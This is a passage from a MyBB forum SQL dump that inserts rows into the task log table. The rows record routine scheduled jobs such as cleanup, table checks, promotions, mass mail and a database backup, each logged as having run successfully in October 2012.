`mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11713', '1', '1350774127', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11714', '7', '1350774137', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11715', '5', '1350774323', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11716', '9', '1350774710', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11717', '5', '1350775569', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11718', '9', '1350775691', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11719', '3', '1350775802', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11720', '9', '1350776893', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11721', '5', '1350776911', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11722', '9', '1350778287', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11723', '3', '1350779369', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11724', '1', '1350780080', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11725', '2', '1350780084', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11726', '7', '1350780098', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11727', '11', '1350780124', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11728', '5', '1350780128', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11729', '9', '1350780211', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11730', '3', '1350780215', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11731', '5', '1350780308', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11732', '9', '1350781761', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11733', '3', '1350781817', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11734', '1', '1350781838', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11735', '7', '1350781863', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11736', '5', '1350781899', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11737', '9', '1350781981', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11738', '5', '1350782722', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11739', '9', '1350782983', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11740', '3', '1350783001', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11741', '9', '1350783653', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11742', '5', '1350783929', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11743', '9', '1350784654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11744', '3', '1350784764', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11745', '1', '1350784851', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11746', '7', '1350784857', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11747', '5', '1350785229', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11748', '9', '1350785532', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11749', '5', '1350786351', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11750', '9', '1350787125', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11751', '3', '1350788001', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11752', '9', '1350788091', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11753', '5', '1350788159', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11754', '9', '1350788172', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11755', '3', '1350788354', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11756', '1', '1350788422', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11757', '7', '1350788450', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11758', '5', '1350788718', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11759', '9', '1350789038', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11760', '5', '1350789928', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11761', '9', '1350789958', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11762', '3', '1350790204', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11763', '9', '1350791894', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11764', '5', '1350791901', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11765', '3', '1350792153', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11766', '1', '1350792280', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11767', '7', '1350793049', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11768', '5', '1350793062', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11769', '9', '1350793075', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11770', '5', '1350793730', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11771', '9', '1350793750', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11772', '3', '1350793835', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11773', '9', '1350794407', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11774', '5', '1350794804', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11775', '9', '1350795307', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11776', '3', '1350795549', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11777', '1', '1350795639', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11778', '7', '1350795645', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11779', '5', '1350795911', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11780', '9', '1350796225', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11781', '5', '1350797139', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11782', '9', '1350797196', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11783', '3', '1350797416', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11784', '9', '1350798008', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11785', '5', '1350798303', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11786', '9', '1350799164', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11787', '3', '1350799278', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11788', '1', '1350799301', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11789', '7', '1350799439', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11790', '5', '1350799576', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11791', '9', '1350799844', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11792', '5', '1350800703', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11793', '9', '1350800750', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11794', '3', '1350801064', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11795', '9', '1350801614', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11796', '5', '1350801950', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11797', '9', '1350802552', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11798', '3', '1350802861', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11799', '1', '1350802877', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11800', '7', '1350802917', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11801', '5', '1350803106', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11802', '9', '1350803648', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11803', '5', '1350804375', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11804', '9', '1350804530', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11805', '3', '1350804941', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11806', '9', '1350805346', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11807', '5', '1350805600', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11808', '9', '1350806356', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11809', '3', '1350806432', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11810', '1', '1350806497', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11811', '7', '1350806512', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11812', '5', '1350806957', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11813', '9', '1350807368', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11814', '5', '1350809174', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11815', '9', '1350809479', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11816', '3', '1350809572', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11817', '9', '1350809833', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11818', '3', '1350809957', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11819', '1', '1350810017', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11820', '7', '1350810024', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11821', '5', '1350810346', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11822', '9', '1350810777', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11823', '5', '1350811513', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11824', '9', '1350811552', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11825', '3', '1350814399', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11826', '9', '1350814426', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11827', '5', '1350814435', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11828', '1', '1350814447', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11829', '7', '1350814461', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11830', '5', '1350817374', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11831', '9', '1350817564', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11832', '3', '1350819139', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11833', '1', '1350819141', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11834', '7', '1350819149', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11835', '5', '1350819160', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11836', '9', '1350819402', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11837', '9', '1350819610', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11838', '5', '1350820328', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11839', '9', '1350820869', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11840', '3', '1350820905', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11841', '1', '1350820922', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11842', '4', '1350820930', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11843', '7', '1350820938', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11844', '5', '1350821117', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11845', '9', '1350821480', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11846', '5', '1350822478', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11847', '9', '1350822622', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11848', '3', '1350822711', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11849', '9', '1350823283', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11850', '5', '1350824029', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11851', '9', '1350824112', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11852', '3', '1350824360', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11853', '1', '1350824414', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11854', '7', '1350824464', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11855', '5', '1350824815', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11856', '9', '1350825638', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11857', '5', '1350826633', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11858', '9', '1350826657', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11859', '3', '1350826663', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11860', '9', '1350829002', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11861', '5', '1350829058', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11862', '3', '1350829104', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11863', '1', '1350829108', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11864', '7', '1350829126', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11865', '5', '1350829518', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11866', '9', '1350829548', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11867', '3', '1350831400', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11868', '9', '1350831831', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11869', '5', '1350831833', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11870', '3', '1350831874', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11871', '1', '1350831903', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11872', '7', '1350831920', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11873', '5', '1350831960', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11874', '9', '1350832311', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11875', '5', '1350833592', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11876', '9', '1350833629', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11877', '3', '1350833653', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11878', '9', '1350834327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11879', '5', '1350834343', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11880', '9', '1350834926', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11881', '3', '1350835202', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11882', '1', '1350835311', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11883', '7', '1350835319', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11884', '5', '1350835645', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11885', '9', '1350836519', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11886', '5', '1350836735', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11887', '9', '1350836747', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11888', '3', '1350837031', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11889', '9', '1350837848', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11890', '5', '1350838113', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11891', '9', '1350839217', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11892', '3', '1350840442', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11893', '1', '1350840451', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11894', '7', '1350840456', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11895', '5', '1350840479', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11896', '9', '1350840607', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11897', '3', '1350841017', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11898', '9', '1350841443', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11899', '5', '1350841502', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11900', '9', '1350842461', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11901', '3', '1350842554', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11902', '1', '1350842557', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11903', '7', '1350842568', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11904', '5', '1350842935', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11905', '9', '1350843262', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11906', '5', '1350843910', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11907', '9', '1350843918', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11908', '3', '1350844277', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11909', '9', '1350844817', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11910', '5', '1350845103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11911', '9', '1350845732', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11912', '3', '1350846033', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11913', '1', '1350846039', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11914', '7', '1350846095', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11915', '5', '1350846630', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11916', '9', '1350846635', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11917', '5', '1350847521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, 